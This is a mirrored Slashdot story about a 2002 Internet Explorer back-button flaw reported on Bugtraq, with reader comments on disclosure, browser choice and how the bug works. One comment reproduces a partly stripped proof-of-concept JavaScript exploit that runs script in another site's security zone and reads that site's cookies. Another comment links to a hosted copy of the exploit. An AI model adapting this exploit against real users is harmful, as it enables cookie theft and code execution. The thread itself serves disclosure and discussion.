Slashdot Mirror


Don't Hit That Back Button

Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When hitting the back button, javascript links will be executed in the security zone of the last url viewed. Proof-of-concept included in the warning will execute minesweeper or read your Google cookies."

9 of 640 comments (clear)

  1. Test it out if you have IE by ekrout · · Score: 5, Informative

    I copied the source from the (now Slashdotted) page and created an HTML file at http://www.eg.bucknell.edu/~ekrout/IE_Hack.html for those of you with IE to test it out. If you want, reply to this post and let everyone know if it works with your browser, Windows version, etc.

    This is a very troubling security hole for Windows users who prefer IE (99.7% of them).

    Founder, monolinux

    --

    If you celebrate Xmas, befriend me (538
  2. Re:Java's been crashing IE of late by asv108 · · Score: 5, Informative
    Java is insecure

    I think your reffering to JavaScript orginally called livescript by Netscape before the Java buzz hit. JavaScript has nothing to do with Java. Java is relatively secure by most standards.

  3. RTFE (exploit) by gartogg · · Score: 5, Informative

    If you read the exploit, you would see why this would not be possible.

    You do not need to actually press the button, but you need to do it from a trusted page.

    --
    I'm a concientious .sig objector.
  4. If MS had acted... any number of times... by Wee · · Score: 5, Informative
    If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole.

    If MS had responded back in November when he made the sploit known, or if they had even thought once about security when designing IE, or if they had any kind of decent security model in the OS, or, or, or... then this never would have happened in the first place and MS wouldn't have to patch the barn door after the horse had left. But don't blame the guy who discovered this by trotting out that "don't tell anyone about the security hole until the vendor can fix it" pablum. Security through obscurity isn't, especially when that obscurity is driven my the needs of the marketing group.

    You find a hole, you do due dilligence, they don't respond (he gave them months to fix it fer cryin' out loud), you publish. Then, most likely, the vendor publishes a fix based on the real needs of users and not the perceived needs of some business unit looking at a bottom line.

    It boggles my mind that one could have a machine rooted simply by browsing the web. A die-hard MS nut at work today was giving me grief over the fact that Red Hat has "published" 500MB of "updates" to "Linux" since version 6.2 and how could the OS be so insecure as to need that many updates... I didn't even have the energy to respond. And I'm all for people running with whatever works for them, but at least I know for a fact that Opera on my machine runs in userland and won't get me rooted. And hopefully, using your favorite browser won't mean data loss and/or a re-image of the OS as well.

    But to blame the guy who discovered it? I mean, honestly, for fsck's sake: we're talking about a web browser, you know? Completely compromising a machine via a back button? And it's been known for five months?!? At least MS could tell users to run another browser until they can fix the issue. Or turn scripting off. Or whatever. The fact that it could happen in the first place is just obscene. Or criminal. MS leaves a bad taste in my mind sometimes...

    -B

    --

    Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.

  5. Re:What are the odds... by SaDan · · Score: 5, Informative
    Read the Bugtraq submission!

    Title: Using the backbutton in IE is dangerous.
    Date: [2002-04-15]
    Software: At least Internet Explorer 6.0.
    Tested env: Windows 2000 pro, XP.
    Rating: Medium because user interaction is needed.
    Impact: Read cookies/local files and execute code
    (triggered when user hits the back button).
    Patch: None.
    Vendor: Microsoft contacted 12 Nov 2001, additional
    information given 25 Mar 2002.
    Workaround: Disable active scripting or never
    use the back button.
    Author: Andreas Sandblad, sandblad@acc.umu.se
    MS was notified late last year... Just over five months ago.

    Read, people... Read, then make comments. It's not that difficult.

  6. Re:A complete list by jesser · · Score: 4, Informative

    I wouldn't call this a "dumb ass bug". It's subtle, and finding it requires being aware of several things and thinking to combine them:

    * javascript: URLs run in the security domain of the page from which they originate. (Or, if they're stored in the user's bookmarks, they run as part of the current page, letting them do cool things like show the HTML source of the selection.)

    * If a javascript: URL returns a non-null value, it acts like a data: URL. For example, javascript:1+2;3+4 is equivalent to data:text/html,7. (Most of the time, this is just an annoyance, forcing you to put "void 0" at the end of a javascript: URL unless you're sure that the last calculation always returns null.)

    * It is possible to go "forward" from a javascript: URL.

    * The Back button incorrectly runs a javascript: URL in the security domain and context the current page instead of running it with no context or with the context of the page that put the URL in session history.

    The fact that the bug was present in both IE and Mozilla until Mozilla 0.9.3 is strong evidence that the hole is not an obvious "dumb ass bug". I only discovered the hole because I make bookmarlets (javascript: URLs) in my free time and was being paid by Netscape to work on Mozilla security last summer.

    --
    The shareholder is always right.
  7. One reason I love Opera by Arker · · Score: 5, Informative

    Opera cured that problem quite effectively. Since I started using it as my main browser, I can't remember finding a page where back wouldn't work properly. It ignores scripts that try to take it over, and it tracks documents-in-frames properly too, you can go forward and back independently in different frames on framed pages.

    --
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Friends don't let friends enable ecmascript.
  8. This is a major one ,, user interaction not needed by rahul_inblue · · Score: 5, Informative

    The flaw can be exploited *with out* user interaction ,, use about: and use a body-onload javascript to execute the back button ,, poc html page is attached. u know what this means :P .

    ----cut here---

    Press link and then the backbutton to trigger script.

    Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)


    Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)


    Read c:\test.txt (needs to be created)


    Read Google cookie

    // badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
    badUrl = "about: ";
    function execFile(file){
    alert (badUrl);

    s = '';
    backBug(badUrl,s);
    }
    function readFile(file){
    s = '';
    backBug(badUrl,s);
    }
    function readCookie(url){
    s = 'alert(document.cookie);close();';
    backBug(url,s);
    }
    function backBug(url,payload){
    len = history.length;
    page = document.location;
    s = "javascript:if (history.length!="+len+") {";
    s+= "open('javascript:document.write(\""+payload+"\")' )";
    s+= ";history.back();} else 'location=\""+url
    s+= "\";document.title=\""+page+"\";';";
    location = s;
    }

    ---cut here---

    --
    _
  9. Re:hm by Kanon · · Score: 4, Informative
    2) I can disable the pop-under ads on sites I frequent by putting those sites into the "restricted" zone. Mozilla offers me no way to disable the popunders without completely disabling Javascript. (I'd rather have a option for "disable all javascript based popups", but at least IE gives me SOMETHING.)

    Get a newer version of mozilla and go into preferences/advanced/scripts and windows.

    Turn off the "open unrequested windows" tickbox. Bingo. You now have to click a link before the popup/under will open. Sites can't open them for you.